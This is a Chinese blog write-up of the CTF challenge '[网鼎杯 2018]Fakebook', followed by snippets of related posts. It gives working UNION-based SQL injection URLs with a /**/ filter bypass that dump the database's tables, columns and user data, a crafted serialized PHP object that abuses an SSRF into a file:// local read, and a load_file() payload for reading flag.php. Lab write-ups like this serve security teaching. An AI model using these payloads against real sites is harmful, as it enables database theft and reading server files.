[网鼎杯 2018]Fakebook

已于 2024-07-16 21:45:52 修改
阅读量414 收藏 10
点赞数 4
文章标签: ctf web buuctf
于 2024-07-16 21:37:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_80472909/article/details/140475714
版权

解法一

在robots.txt,可以发现/user.php.bak

下载下来是一段代码
 

<?php


class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }

}

很明显是 SSRF的 , 但还不知道要咋用

注册一个账号登录进去 , 可以发现在url上存在一个参数可以进行传参

/view.php?no=1
先随便传点东西进去

估计存在sql注入啥的, 尝试进行测试

估计就是sql注入了, 需要绕过一些过滤

union select 不行, 但是单独的union 和 select 可以, 可能是不能连一起 , 中间用 /**/
可以正常回显

在测试的时候可以发现第二个参数可以回显
当前数据库: fakebook

得到表名:users
/view.php?no=-1 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='fakebook'--+

得到列名:  no,username,passwd,data

/view.php?no=-1 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema='fakebook' and table_name='users'--+

得到数据 看着很糊, 但没有flag
/view.php?no=-1 union/**/select 1,group_concat(no,username,passwd,data),3,4 from fakebook.users--+

单独看 data 的数据
很明显的反序列化的内容 , 之前注册账号的内容
/view.php?no=-1 union/**/select 1,group_concat(data),3,4 from fakebook.users--+

这里就要跟前面得到的 代码有关了

利用SSRF的file协议读取本地文件
(前面给的序列化字符串, 猜测应该会进行一个反序列化)

<?php
class Userinfo
{
    public $name = "www";
    public $age = 15;
    public $blog = "file:///var/www/html/flag.php";
}
$data = new Userinfo();
echo serialize($data);

?no=-1 union/**/select 1,2,3,'O:8:"Userinfo":3:{s:4:"name";s:3:"www";s:3:"age";i:15;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'
 

前面可以知道是data字段存放着序列化的字符串 , 所以将自己构造的序列化字符串放在第四个位置注入进去

源码里面可以找到一串特性的字符串, 点击一下, 就会跳转到相应的界面得到flag

解法二:

直接通过sql读取函数直接读取flag.php文件,借助load_file()函数

里面的参数是一个完整的路径,于是我们直接用var/www/html/flag.php路径去访问一下这个文件就可以拿的到flag

pyload:

?no=-1 union/**/select 1,load_file("/var/www/html/flag.php"),3,4--+

pwfortune
关注
【网络安全 | CTFfakebook网鼎杯2018)解题详析
等风来
07-24 1万+
登录后发现传参,构造字符型参数,回显error判断为数字型注入,查看注入点数目:由上下两张图可知注入点数目为4经测试可知对空格进行过滤,可通过/**/或+绕过,但程序也过滤了+,因此使用前者no改为0的原因是使程序报错,从而回显库名fakebookno=0/**/union/**/select/**/1,(select/**/group_concat(column_name)/**/from information_schema.columns/**/where/**/table_name='users')
网鼎杯 2018 Fakebook
weixin_45751765的博客
10-01 1590
1NDEX0x00 初试0x01 复现 0x00 初试 一开始有两个选项:一个join,一个login 此处blog存在过滤 注册完返回首页发现username栏是超链接 单击后发现 url–> http://47bdcd94-3a3d-4ae5-af77-4390d01fd436.node4.buuoj.cn:81/view.php?no=1 盲猜是注入(讲真我一开始真没有意识先去判断是数字型注入还是字符型注入) 因为手注测试的时候十分的奇怪… 先通过updatexml报错注入得到一些信息 注注
BUUCTF——[网鼎杯 2018]Fakebook
m_de_g的博客
04-24 700
【代码】BUUCTF——[网鼎杯 2018]Fakebook
网鼎杯2018 fakebook
feng的博客
10-28 348
知识点 PHP反序列化 备份文件下载 SSRF SQL注入 前言 我就是fw…又没解出来,主要的问题还是在自己身上,当时sql注入读了username,以为就是我输入的,就没继续爆破了,没想到data居然是序列化的,还有就是SQL注入学的还不好,导致自己没能解出来。 WP 首先进入环境,有join和login。先用dirsearch扫一下目录,发现存在robots.txt,访问发现存在user.php.bak备份文件。下载下来: <?php class UserInfo { publi
[网鼎杯 2018]Fakebook 1
m0_73728268的博客
03-29 225
1.SSRF伪协议漏洞注入 2.SSRF中的伪协议
[网鼎杯 2018]Fakebook——SSRF/反序列化漏洞/SQL注入
sGanYu
09-29 3724
解法一 解法二 解法三 考点 • 目录扫描 • SSRF • SQL注入 • PHP反序列化 前言:当我们拿到网站的时候,首先需要对这个网站进行信息收集,扩大漏洞发现的概率,比如whois、指纹识别、扫描目标站点的目录,寻找敏感信息、后台又或者是否存在备份文件,其实靶场也一样,如果觉得麻烦,也可能错过发现一个可利用的漏洞 开始之前,先扫描一下该网站下目录,查看有什么敏感信息泄露 直接扫出了flag.php文件,有是有,但是访问后,回显内容为空,当我们确定了一个
BUUCTF-[网鼎杯 2018]Fakebook
qq_43006864的博客
04-20 1762
打开题目 点击login,一个登陆界面。没啥发现。 点击join。注册一个账号看看。 这里可以看到:http://46021289-6e25-4fee-b4db-f69979ef4362.node4.buuoj.cn:81/view.php?no=1 盲猜可以sql注入。测试了一下,貌似还不需要闭合,直接接语句就可以。 测试出来字段为4,开始尝试获取数据库信息。 貌似有waf,尝试使用/**/绕过。 成功绕过,并且发现注入点...
[网鼎杯 2018]Fakebook(思路详细有说明)
weixin_73560599的博客
07-31 715
这题较为综合 涉及了SQL注入以及SSRF和反序列化以及ctf扫目录脚本工具的使用 是一道小综合的题目
BUUCTF[网鼎杯 2018]Fakebook 1
snowlyzz的博客
05-01 880
来到首页先创建了一个用户 点击自己创建的用户admin: 发现url 疑似有sql注入。   ?n=1 and 1=1 正常回显   ?n=1 and 1=2 回显异常(存在SQL注入)   ?n=1 order by 1# 正常回显   ?n=1 order by 2# 正常回显   ?n=1 order by 3# 正常回显   ?n=1 order by 4# 正常回显   ?n=1 order by 5# 回显异常(判断存在4个字段) 直接联合查询,发现 uni...
buuctf-[网鼎杯 2018]Fakebook
qq_42728977的博客
12-17 1140
[网鼎杯 2018]Fakebook考点复现法1,load_file()法2,纯sql注入总结参考 考点 sql注入 复现 法1,load_file() 注册登陆之后 http://7941e7a5-1b59-447e-ade4-122033824831.node4.buuoj.cn:81/view.php?no=0 可能存在注入点,尝试,发现确实有 http://7941e7a5-1b59-447e-ade4-122033824831.node4.buuoj.cn:81/view.php?no=0 un
[网鼎杯 2018]Fakebook 解题思路&过程
iamblackcat's blog
09-12 1752
[网鼎杯 2018]Fakebook 解题思路&过程
题解:BUUCTF [网鼎杯 2018]Fakebook 1
qq_62886656的博客
06-14 719
题解
linux命令find实现_find.zip
09-17
linux命令find实现_find
基于ssm的高校信息资源共享平台设计与实现.docx
09-17
基于ssm的高校信息资源共享平台设计与实现.docx
吉他谱_Plush - Stone Temple Pilots.pdf
09-17
初级入门吉他谱 guitar tab
Unit1docx
09-17
.Unit1docx
Linux下命令独占操作锁_Linux-Command-Lock.zip
最新发布
09-17
Linux下命令独占操作锁_Linux-Command-Lock
基于ssm的汉服文化平台网站设计与实现.docx
09-17
基于ssm的汉服文化平台网站设计与实现.docx
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值